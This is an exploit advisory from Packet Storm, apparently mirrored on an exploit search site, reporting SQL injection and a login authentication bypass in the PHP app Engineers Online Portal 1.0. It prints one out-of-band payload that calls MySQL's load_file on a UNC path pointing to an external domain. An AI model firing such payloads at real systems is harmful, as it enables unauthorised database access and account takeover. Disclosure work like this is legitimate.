Share
## https://sploitus.com/exploit?id=PACKETSTORM:164535
# Exploit Title: Engineers Online Portal 1.0 is vulnerable to three types  
of SQL injection attacks.  
# Author: nu11secur1ty  
# Testing and Debugging: nu11secur1ty  
# Date: 10.13.2021  
# Vendor: https://www.sourcecodester.com/users/janobe  
# Link:  
https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html  
  
[+] Exploit Source:  
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101321  
  
[+] Description:  
The id parameter from my_classmates.php on the Engineers Online Portal app  
appears to be vulnerable to three types of SQL injection  
attacks, boolean-based blind, error-based, and UNION query.  
The payload '+(select load_file('\  
hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc'))+'  
was submitted in the id parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file function  
with a UNC file path that references a URL on an external domain.  
The application interacted with that domain, indicating that the injected  
SQL query was executed.  
Also, user login is vulnerable to SQL-Injection bypass authentication on  
parameter "username".  
  
  
----------------------------------------------------------------------------------------